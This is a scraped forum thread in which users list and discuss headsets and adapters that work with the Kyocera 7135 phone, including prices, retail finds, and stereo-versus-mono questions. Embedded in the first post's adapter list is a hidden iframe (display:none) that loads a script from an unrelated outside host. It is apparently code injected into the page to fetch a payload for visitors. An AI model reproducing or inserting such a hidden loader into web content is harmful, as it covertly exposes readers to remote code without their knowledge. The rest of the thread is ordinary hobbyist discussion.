Poll: What type of phone headset do you prefer?

+ Reply to Thread
Page 1 of 5 1 2 3 4 5 LastLast
    AJR

Compatible Headsets for the 7135

I've created this thread to start a list of headsets that are compatible with the 7135. Most headsets with no special features should be compatible with the 7135. The ones we're looking for on this list should have some type of special feature such as on/off button (most helpful), wireless, volume control/mute, etc. This list should be helpful to everyone and should include all types of headsets (Wireless, over-the-ear, earbud, etc).

If anyone has any to add to this list, please do so below and I will bring them up into this post. Please include make, model, any special features, where to buy it, price, and if possible, a link to the manufacturer website for the particular model.

Wireless
    * Jabra FreeSpeak BT200 w/ Non-Bluetooth Adapter
    * Plantronics M1500

Earbud Style
    * Kyocera Stereo Earbud Headset w/ Answer button
    * Plantronics MX100 (joekonaiii)
    * Belkin Straight Boom (F8V920-STB) w/ Answer Button (Ngav)
    * GE/Sanyo "Platinum Power" EarBud w/ Answer Button and Telescopic Mic (#4076

Over-the-Ear
    * Belkin E Series OverEar Boom (F8V920-EHB) w/ Answer Button and Volume Control
    * GE/Sanyo "Platinum Power" Over-Ear w/ Answer Button and Volume Control (#40764)

Over-the-Head
    None

Adapters
    * Comfort Clip - Earbud to Over-the-Ear Adapter
    * Jabra FreeSpeak 2.5mm Headset Cable Adapter
    * Cool Cat's 7135 Headset Adapters<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Belkin Model

I have been using the belkin model http://catalog.belkin.com/IWCatProdu...duct_Id=125806

It is working really well. I press the button to start a call and use the voice feature on the phone. Just press the button on the earpiece to end the call or to answer an incoming one. I did manage to squeeze a jabra ear jel on it to make it more comfortable.

Fully Converged
    Dan's is advertising the Plantronics MX100 Handsfree Kit on ebay; looks like a nice design with a fixed earbud. I ordered one and will check it out.

http://cgi.ebay.com/ws/eBayISAPI.dll...019566781&rd=1
    From the Middle of the Sea ;-)

Most of the headsets discussed above are mono. I'd be interested in hearing about the best combo headsets (i.e., stereo, with the ability to answer a call, much like Kyo's headset, except with that one, I, like other people, have problems keeping them in my ear).

headsets for mp3s

Been reading that Coolcat will make an adapter for common walkman type headsets to work with the 7135 recepticle? If you are out there and willing Coolcat, can you email me? I looked for your address in the mmebers are but couldn't find it.

Also, does anyone know if a normal mono cell phopne headset will play mono sound for mp3? I haven't bought a SD card yet to try it out.

Rich - loving my 7135 more every day!
    explore65@yahoo.com

Re: headsets for mp3s

Originally posted by 8900200
    Been reading that Coolcat will make an adapter for common walkman type headsets to work with the 7135 recepticle? If you are out there and willing Coolcat, can you email me? I looked for your address in the mmebers are but couldn't find it.

Also, does anyone know if a normal mono cell phopne headset will play mono sound for mp3? I haven't bought a SD card yet to try it out.

Rich - loving my 7135 more every day!
    explore65@yahoo.com
    When using a mono headset, the stereo will play the left channel of the stereo sound only. To resolve this problem (I have a Jabra BT mono headset that I want to use while biking), Coolcat is making me an adapter that will combine the two channels of stereo signal for the single speaker.

If you search for any message from him, his website is in the signature.

Headset or earbuds?

I have previously looked for such a discussion, and was unable to
    find anything. Apologies if it's there and I missed it.

- What do you users prefer, earbuds or a headset?

- As for the headset, does it have larger speakers in it than in
    earbuds (which I assume)? If so, is there a noticeable difference
    in battery life due to driving larger speakers?

Thanks in advance.

BS

AJR
    I've covered this issue here. I'm also trying to compile a list of all headsets with special features that work with the 7135 (preferrably an answer button, but other features as well).

Administrator

Re: Headset or earbuds?

Originally posted by lyron
    I have previously looked for such a discussion, and was unable to
    find anything. Apologies if it's there and I missed it.

- What do you users prefer, earbuds or a headset?

- As for the headset, does it have larger speakers in it than in
    earbuds (which I assume)? If so, is there a noticeable difference
    in battery life due to driving larger speakers?

Thanks in advance.

BS
    there wiill be a greater draw on head 'phones' because of the larger driver as you expect. they will tend to have more low freq. response over 'buds' but will sound much better on average.

AJR
    They always say you'll find what you're looking for when you're not looking! I was out and about with my wife at Wal-Mart and Target, and ended up finding a few headsets with answer/end buttons that work with the 7135...

At Wal-Mart, I found the Belkin E Series OverEar Boom Headset (F8V920-EHB). For some reason, I can't find a link to it on the Belkin website, but I'm using it right now and it's a great headset for $12.97! It has the answer/end button and a volume control. It says the answer/end button is for compatible Samsung phones, but it works well with the 7135!

At Target, I found the GE/Sanyo "Platinum Power" Over-the-Ear w/ Answer button and Volume control. There was no model or stock number on the package, only an order # on the back of 40764. The package shows compatible with Samsung, TouchPoint/LG, and AudioVox, but I tried it and it works with the 7135. It was $19.99. There was also a GE/Sanyo "Platinum Power" EarBud with Answer button and telescoping microphone. Again, no model or stock number, but the order # on the package was 40768. Same compatibility as the Over-the-Ear, and it was $14.99.

I updated the list in the first post of this thread with these 3 headsets.

I thought the Plantronics MX100 did NOT have an Answer/End button on it?

I like the idea of wireless but I don't think you will be able to get the bandwidth (using bluetooth) needed for great sound and then the battery life would really be off. Anyone got any experiece with such?

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.

I curently am using the verizon stereo head phones. I had a pretty good experience with them, they stay in and do have the answer button! It works fine for me, even MP3s play well (they're not big bass hitters but still have a decent sound)
    Attached Thumbnails Attached Thumbnails Compatible Headsets for the 7135-ear-buds.jpg  

I noticed in that pic above, I can't see the small rubber flip open cover for the headset jack. Did you completely remove it? I have found that the rubber cover on my headset jack is starting to remain permanently folded open. Anyone else? Did you just remove it completely?

Yeah.. Sad but true, the little rubber cover is still on and stays bent open. Although I have had pretty good luck with pulling up, (in the direction of the hinge) on the cover, and it stays in pretty good so far. I don'know how long this fix will last though..

The rubber headset jack covers on my phones always stay in. Once a cover didn't act right but just aiming better secured it.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

I have to agree Beryl, That a little practice aiming it makes all the difference in the world........lol

I like the way yer thinkin"

I'm using the earbud-style headset that came free with my VisorPhone.

BUT, these don't have a call/answer button. I just (30 seconds ago) figured out how to answer a call with voice. Is there a way to make a call using just voice?

Registered User All-Purpose Guru's Avatar
    Originally posted by mwshook
    I'm using the earbud-style headset that came free with my VisorPhone.

BUT, these don't have a call/answer button. I just (30 seconds ago) figured out how to answer a call with voice. Is there a way to make a call using just voice?
    If you're plugged in, you can just say 'wakeup' twice to drop into the voice recognizer.

the only thing you can't do is hang up.
    --apg

"Invention, my dear friends, is ninety-three percent perspiration, six percent electricity, four percent evaporation, and two percent butterscotch ripple." --W. Wonka

I am looking for a specific type of headset. I only want the stereo
    set for listening to music (I'm not interested in being able to use
    the phone with the headset, so a mic is not necessary).

The style that I'm looking for is in fact a structural headset (rather
    than two independent earbuds), but the two speakers are about
    earbud size, and they sit suspended in the hole in each ear to
    produce a pretty good sound. Sony makes such a headset (that
    folds, as a matter of fact), but it employs the 1/8" jack.

I'd like to know if/where such an item is available, and if not, could
    I just get a 1/8" to 3/32" stereo adapter to use them with the

Thanks for your help.

BS